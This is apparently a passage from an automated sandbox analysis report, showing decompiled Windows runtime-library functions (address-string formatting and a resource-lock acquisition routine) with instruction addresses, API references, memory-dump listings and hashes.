                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B2206
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                              • API String ID: 885266447-4236105082
                                                                                                                                                                                                              • Opcode ID: 1308bcba8b59a0c57a5eed0ecb0ba5254ed24d2ff474b98c80bf5c1c2d412c11
                                                                                                                                                                                                              • Instruction ID: 5944a5b67be2a4145b1090f46fc2d6b3860a3798719e05829e128bc2a6f24749
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1308bcba8b59a0c57a5eed0ecb0ba5254ed24d2ff474b98c80bf5c1c2d412c11
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C514831B006016FEB15DA1CCC82FA673A9FB98725F258229FD14DF386D935EC418B91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                                              			E008914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				char _v10;
                                                                                                                                                                                                              				char _v140;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int _t24;
                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                              				intOrPtr _t45;
                                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                                              				intOrPtr* _t52;
                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                              				signed int _t57;
                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t51 = __edx;
                                                                                                                                                                                                              				_t24 =  *0x932088; // 0x774227ca
                                                                                                                                                                                                              				_v8 = _t24 ^ _t57;
                                                                                                                                                                                                              				_t45 = _a16;
                                                                                                                                                                                                              				_t53 = _a4;
                                                                                                                                                                                                              				_t52 = _a20;
                                                                                                                                                                                                              				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                              					_t26 = 0xc000000d;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					if(_t45 == 0) {
                                                                                                                                                                                                              						if( *_t52 == _t45) {
                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							goto L10;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                              						_t28 =  &_v140;
                                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                                              							_push("[");
                                                                                                                                                                                                              							_push(0x41);
                                                                                                                                                                                                              							_push( &_v140);
                                                                                                                                                                                                              							_t29 = E00887707();
                                                                                                                                                                                                              							_t58 = _t58 + 0xc;
                                                                                                                                                                                                              							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t54 = E008913CB(_t53, _t28);
                                                                                                                                                                                                              						if(_a8 != 0) {
                                                                                                                                                                                                              							_t34 = E00887707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                                                                              							_t58 = _t58 + 0x10;
                                                                                                                                                                                                              							_t54 = _t54 + _t34 * 2;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                                              							_t40 = E00887707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                                                                              							_t58 = _t58 + 0x10;
                                                                                                                                                                                                              							_t54 = _t54 + _t40 * 2;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                                                                              						 *_t52 = _t53;
                                                                                                                                                                                                              						if( *_t52 < _t53) {
                                                                                                                                                                                                              							goto L10;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							E00852340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                                                                              							_t26 = 0;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return E0085E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                                                                              			}




















                                                                                                                                                                                                              0x008914c0
                                                                                                                                                                                                              0x008914cb
                                                                                                                                                                                                              0x008914d2
                                                                                                                                                                                                              0x008914d6
                                                                                                                                                                                                              0x008914da
                                                                                                                                                                                                              0x008914de
                                                                                                                                                                                                              0x008914e3
                                                                                                                                                                                                              0x0089157a
                                                                                                                                                                                                              0x0089157a
                                                                                                                                                                                                              0x008914f1
                                                                                                                                                                                                              0x008914f3
                                                                                                                                                                                                              0x008bea0f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bea15
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bea15
                                                                                                                                                                                                              0x008914f9
                                                                                                                                                                                                              0x008914f9
                                                                                                                                                                                                              0x008914fe
                                                                                                                                                                                                              0x00891504
                                                                                                                                                                                                              0x008bea1a
                                                                                                                                                                                                              0x008bea1f
                                                                                                                                                                                                              0x008bea21
                                                                                                                                                                                                              0x008bea22
                                                                                                                                                                                                              0x008bea27
                                                                                                                                                                                                              0x008bea2a
                                                                                                                                                                                                              0x008bea2a
                                                                                                                                                                                                              0x00891515
                                                                                                                                                                                                              0x00891517
                                                                                                                                                                                                              0x0089156d
                                                                                                                                                                                                              0x00891572
                                                                                                                                                                                                              0x00891575
                                                                                                                                                                                                              0x00891575
                                                                                                                                                                                                              0x0089151e
                                                                                                                                                                                                              0x008bea50
                                                                                                                                                                                                              0x008bea55
                                                                                                                                                                                                              0x008bea58
                                                                                                                                                                                                              0x008bea58
                                                                                                                                                                                                              0x0089152e
                                                                                                                                                                                                              0x00891531
                                                                                                                                                                                                              0x00891533
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00891535
                                                                                                                                                                                                              0x00891541
                                                                                                                                                                                                              0x00891549
                                                                                                                                                                                                              0x00891549
                                                                                                                                                                                                              0x00891533
                                                                                                                                                                                                              0x008914f3
                                                                                                                                                                                                              0x00891559

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 008BEA22
                                                                                                                                                                                                                • Part of subcall function 008913CB: ___swprintf_l.LIBCMT ref: 0089146B
                                                                                                                                                                                                                • Part of subcall function 008913CB: ___swprintf_l.LIBCMT ref: 00891490
                                                                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 0089156D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                                                                                              • Opcode ID: e7aef026dbae33c5159153064f9347acc0dc2d7770d8ca5c2ee3ecf90ccc28ab
                                                                                                                                                                                                              • Instruction ID: b79a6af8e24e4bf480ebaa2a3791af8f24b893255340c737e756f032ec17b5ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7aef026dbae33c5159153064f9347acc0dc2d7770d8ca5c2ee3ecf90ccc28ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43219C7290422A9BCF20BE58CC49AEA73BCFB60705F5A4051FC46D3240DB74AA588BE1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                                              			E008753A5(signed int _a4, char _a8) {
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int _t32;
                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                              				signed int _t42;
                                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                                              				signed int _t57;
                                                                                                                                                                                                              				signed int _t64;
                                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                                              				intOrPtr _t78;
                                                                                                                                                                                                              				signed int* _t79;
                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                                              				signed int _t92;
                                                                                                                                                                                                              				void* _t104;
                                                                                                                                                                                                              				void* _t105;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t64 = _a4;
                                                                                                                                                                                                              				_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                              				_t71 = _t64 + 0x28;
                                                                                                                                                                                                              				_push(_t92);
                                                                                                                                                                                                              				if(_t32 < 0) {
                                                                                                                                                                                                              					_t78 =  *[fs:0x18];
                                                                                                                                                                                                              					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						__eflags = _t32 | 0xffffffff;
                                                                                                                                                                                                              						asm("lock xadd [ecx], eax");
                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                              					_push(_t86);
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						L4:
                                                                                                                                                                                                              						__eflags = _t32;
                                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                                              							break;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags = _a8;
                                                                                                                                                                                                              						if(_a8 == 0) {
                                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                                              							return 0;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                              							_t79 = _t64 + 0x24;
                                                                                                                                                                                                              							_t71 = 1;
                                                                                                                                                                                                              							asm("lock xadd [eax], ecx");
                                                                                                                                                                                                              							_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                              							_a4 = _t32;
                                                                                                                                                                                                              							__eflags = _t32;
                                                                                                                                                                                                              							if(_t32 != 0) {
                                                                                                                                                                                                              								L19:
                                                                                                                                                                                                              								_t86 = 0;
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                                                                              									asm("sbb esi, esi");
                                                                                                                                                                                                              									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009301c0;
                                                                                                                                                                                                              									_push(_t92);
                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                              									_t37 = E0084F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                                                                              									__eflags = _t37 - 0x102;
                                                                                                                                                                                                              									if(_t37 != 0x102) {
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t71 =  *(_t92 + 4);
                                                                                                                                                                                                              									_t85 =  *_t92;
                                                                                                                                                                                                              									_t51 = E00894FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                                                                              									_push(_t85);
                                                                                                                                                                                                              									_push(_t51);
                                                                                                                                                                                                              									E008A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                                                                              									E008A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                                                                              									_t86 = _t86 + 1;
                                                                                                                                                                                                              									_t105 = _t104 + 0x28;
                                                                                                                                                                                                              									__eflags = _t86 - 2;
                                                                                                                                                                                                              									if(__eflags > 0) {
                                                                                                                                                                                                              										E008D217A(_t71, __eflags, _t64);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                              									_push(0x65);
                                                                                                                                                                                                              									E008A3F92();
                                                                                                                                                                                                              									_t104 = _t105 + 0xc;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = _t37;
                                                                                                                                                                                                              								if(__eflags < 0) {
                                                                                                                                                                                                              									_push(_t37);
                                                                                                                                                                                                              									E00893915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                                                                              									asm("int3");
                                                                                                                                                                                                              									_t40 =  *_t71;
                                                                                                                                                                                                              									 *_t71 = 0;
                                                                                                                                                                                                              									__eflags = _t40;
                                                                                                                                                                                                              									if(_t40 == 0) {
                                                                                                                                                                                                              										L1:
                                                                                                                                                                                                              										_t42 = E00875384(_t92 + 0x24);
                                                                                                                                                                                                              										if(_t42 != 0) {
                                                                                                                                                                                                              											goto L31;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											goto L2;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                                                                              										_push( &_a4);
                                                                                                                                                                                                              										_push(_t40);
                                                                                                                                                                                                              										_t49 = E0084F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                                                                              										__eflags = _t49;
                                                                                                                                                                                                              										if(__eflags >= 0) {
                                                                                                                                                                                                              											goto L1;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											_push(_t49);
                                                                                                                                                                                                              											E00893915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                                                                              											L31:
                                                                                                                                                                                                              											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                                              											_push( &_a4);
                                                                                                                                                                                                              											_push(1);
                                                                                                                                                                                                              											_t42 = E0084F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                                              											__eflags = _t42;
                                                                                                                                                                                                              											if(__eflags >= 0) {
                                                                                                                                                                                                              												L2:
                                                                                                                                                                                                              												return _t42;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												_push(_t42);
                                                                                                                                                                                                              												E00893915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                                              												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                                              												_push( &_a4);
                                                                                                                                                                                                              												_push(1);
                                                                                                                                                                                                              												_t42 = E0084F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                                              												__eflags = _t42;
                                                                                                                                                                                                              												if(__eflags >= 0) {
                                                                                                                                                                                                              													goto L2;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													_push(_t42);
                                                                                                                                                                                                              													_t45 = E00893915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                                              													asm("int3");
                                                                                                                                                                                                              													while(1) {
                                                                                                                                                                                                              														_t74 = _t45;
                                                                                                                                                                                                              														__eflags = _t45 - 1;
                                                                                                                                                                                                              														if(_t45 != 1) {
                                                                                                                                                                                                              															break;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														_t86 = _t86 | 0xffffffff;
                                                                                                                                                                                                              														_t45 = _t74;
                                                                                                                                                                                                              														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                                              														__eflags = _t45 - _t74;
                                                                                                                                                                                                              														if(_t45 != _t74) {
                                                                                                                                                                                                              															continue;
                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                              															_t46 =  *[fs:0x18];
                                                                                                                                                                                                              															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                                                                              															return _t46;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														goto L38;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													E00875329(_t74, _t92);
                                                                                                                                                                                                              													_push(1);
                                                                                                                                                                                                              													_t48 = E008753A5(_t92);
                                                                                                                                                                                                              													return _t48;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t71 =  *_t79;
                                                                                                                                                                                                              								__eflags = _t71;
                                                                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										_t57 = _t71;
                                                                                                                                                                                                              										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                              										__eflags = _t57 - _t71;
                                                                                                                                                                                                              										if(_t57 == _t71) {
                                                                                                                                                                                                              											break;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_t71 = _t57;
                                                                                                                                                                                                              										__eflags = _t57;
                                                                                                                                                                                                              										if(_t57 > 0) {
                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t32 = _a4;
                                                                                                                                                                                                              									__eflags = _t71;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L19;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L38;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t71 = _t71 | 0xffffffff;
                                                                                                                                                                                                              					_t32 = 0;
                                                                                                                                                                                                              					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                              					__eflags = 0;
                                                                                                                                                                                                              					if(0 != 0) {
                                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L38:
                                                                                                                                                                                                              			}


























                                                                                                                                                                                                              0x008753ab
                                                                                                                                                                                                              0x008753ae
                                                                                                                                                                                                              0x008753b1
                                                                                                                                                                                                              0x008753b4
                                                                                                                                                                                                              0x008753b7
                                                                                                                                                                                                              0x008905b6
                                                                                                                                                                                                              0x008905c0
                                                                                                                                                                                                              0x008905c3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008905c9
                                                                                                                                                                                                              0x008905c9
                                                                                                                                                                                                              0x008905cc
                                                                                                                                                                                                              0x008905d5
                                                                                                                                                                                                              0x008905d5
                                                                                                                                                                                                              0x008753bd
                                                                                                                                                                                                              0x008753bd
                                                                                                                                                                                                              0x008753bd
                                                                                                                                                                                                              0x008753be
                                                                                                                                                                                                              0x008753be
                                                                                                                                                                                                              0x008753be
                                                                                                                                                                                                              0x008753c0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b2269
                                                                                                                                                                                                              0x008b226d
                                                                                                                                                                                                              0x008b2349
                                                                                                                                                                                                              0x008b234d
                                                                                                                                                                                                              0x008b2273
                                                                                                                                                                                                              0x008b2276
                                                                                                                                                                                                              0x008b2279
                                                                                                                                                                                                              0x008b227e
                                                                                                                                                                                                              0x008b2283
                                                                                                                                                                                                              0x008b2287
                                                                                                                                                                                                              0x008b228a
                                                                                                                                                                                                              0x008b228d
                                                                                                                                                                                                              0x008b228f
                                                                                                                                                                                                              0x008b22bc
                                                                                                                                                                                                              0x008b22bc
                                                                                                                                                                                                              0x008b22bc
                                                                                                                                                                                                              0x008b22be
                                                                                                                                                                                                              0x008b22c4
                                                                                                                                                                                                              0x008b22cc
                                                                                                                                                                                                              0x008b22d0
                                                                                                                                                                                                              0x008b22d6
                                                                                                                                                                                                              0x008b22d7
                                                                                                                                                                                                              0x008b22da
                                                                                                                                                                                                              0x008b22df
                                                                                                                                                                                                              0x008b22e4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b22e6
                                                                                                                                                                                                              0x008b22e9
                                                                                                                                                                                                              0x008b22f4
                                                                                                                                                                                                              0x008b22f9
                                                                                                                                                                                                              0x008b22fa
                                                                                                                                                                                                              0x008b2305
                                                                                                                                                                                                              0x008b2314
                                                                                                                                                                                                              0x008b2319
                                                                                                                                                                                                              0x008b231a
                                                                                                                                                                                                              0x008b231d
                                                                                                                                                                                                              0x008b2320
                                                                                                                                                                                                              0x008b2323
                                                                                                                                                                                                              0x008b2323
                                                                                                                                                                                                              0x008b2328
                                                                                                                                                                                                              0x008b232d
                                                                                                                                                                                                              0x008b232f
                                                                                                                                                                                                              0x008b2331
                                                                                                                                                                                                              0x008b2336
                                                                                                                                                                                                              0x008b2336
                                                                                                                                                                                                              0x008b233b
                                                                                                                                                                                                              0x008b233d
                                                                                                                                                                                                              0x008b2350
                                                                                                                                                                                                              0x008b2351
                                                                                                                                                                                                              0x008b2356
                                                                                                                                                                                                              0x008b2359
                                                                                                                                                                                                              0x008b2359
                                                                                                                                                                                                              0x008b235b
                                                                                                                                                                                                              0x008b235d
                                                                                                                                                                                                              0x00875367
                                                                                                                                                                                                              0x0087536b
                                                                                                                                                                                                              0x00875372
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b2363
                                                                                                                                                                                                              0x008b2363
                                                                                                                                                                                                              0x008b2369
                                                                                                                                                                                                              0x008b236a
                                                                                                                                                                                                              0x008b236c
                                                                                                                                                                                                              0x008b2371
                                                                                                                                                                                                              0x008b2373
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b2379
                                                                                                                                                                                                              0x008b2379
                                                                                                                                                                                                              0x008b237a
                                                                                                                                                                                                              0x008b237f
                                                                                                                                                                                                              0x008b237f
                                                                                                                                                                                                              0x008b2385
                                                                                                                                                                                                              0x008b2386
                                                                                                                                                                                                              0x008b2389
                                                                                                                                                                                                              0x008b238e
                                                                                                                                                                                                              0x008b2390
                                                                                                                                                                                                              0x00875378
                                                                                                                                                                                                              0x0087537c
                                                                                                                                                                                                              0x008b2396
                                                                                                                                                                                                              0x008b2396
                                                                                                                                                                                                              0x008b2397
                                                                                                                                                                                                              0x008b239c
                                                                                                                                                                                                              0x008b23a2
                                                                                                                                                                                                              0x008b23a3
                                                                                                                                                                                                              0x008b23a6
                                                                                                                                                                                                              0x008b23ab
                                                                                                                                                                                                              0x008b23ad
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b23b3
                                                                                                                                                                                                              0x008b23b3
                                                                                                                                                                                                              0x008b23b4
                                                                                                                                                                                                              0x008b23b9
                                                                                                                                                                                                              0x008b23ba
                                                                                                                                                                                                              0x008b23ba
                                                                                                                                                                                                              0x008b23bc
                                                                                                                                                                                                              0x008b23bf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a9153
                                                                                                                                                                                                              0x008a9158
                                                                                                                                                                                                              0x008a915a
                                                                                                                                                                                                              0x008a915e
                                                                                                                                                                                                              0x008a9160
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a9166
                                                                                                                                                                                                              0x008a9166
                                                                                                                                                                                                              0x008a9171
                                                                                                                                                                                                              0x008a9176
                                                                                                                                                                                                              0x008a9176
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a9160
                                                                                                                                                                                                              0x008b23c6
                                                                                                                                                                                                              0x008b23cb
                                                                                                                                                                                                              0x008b23ce
                                                                                                                                                                                                              0x008b23d7
                                                                                                                                                                                                              0x008b23d7
                                                                                                                                                                                                              0x008b23ad
                                                                                                                                                                                                              0x008b2390
                                                                                                                                                                                                              0x008b2373
                                                                                                                                                                                                              0x008b233f
                                                                                                                                                                                                              0x008b233f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b233f
                                                                                                                                                                                                              0x008b2291
                                                                                                                                                                                                              0x008b2291
                                                                                                                                                                                                              0x008b2293
                                                                                                                                                                                                              0x008b2295
                                                                                                                                                                                                              0x008b229a
                                                                                                                                                                                                              0x008b22a1
                                                                                                                                                                                                              0x008b22a3
                                                                                                                                                                                                              0x008b22a7
                                                                                                                                                                                                              0x008b22a9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b22ab
                                                                                                                                                                                                              0x008b22ad
                                                                                                                                                                                                              0x008b22af
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b22af
                                                                                                                                                                                                              0x008b22b1
                                                                                                                                                                                                              0x008b22b4
                                                                                                                                                                                                              0x008b22b4
                                                                                                                                                                                                              0x008b22b6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b22b6
                                                                                                                                                                                                              0x008b228f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008b226d
                                                                                                                                                                                                              0x008753cb
                                                                                                                                                                                                              0x008753ce
                                                                                                                                                                                                              0x008753d0
                                                                                                                                                                                                              0x008753d4
                                                                                                                                                                                                              0x008753d6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008753d8
                                                                                                                                                                                                              0x008753e3
                                                                                                                                                                                                              0x008753ea
                                                                                                                                                                                                              0x008753ea
                                                                                                                                                                                                              0x008753d6
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B22F4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008B22FC
                                                                                                                                                                                                              • RTL: Resource at %p, xrefs: 008B230B
                                                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 008B2328
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
